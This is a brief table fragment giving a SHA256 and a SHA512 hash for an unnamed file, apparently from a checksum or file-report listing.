| SHA256 | ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955 |
| SHA512 | ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08 |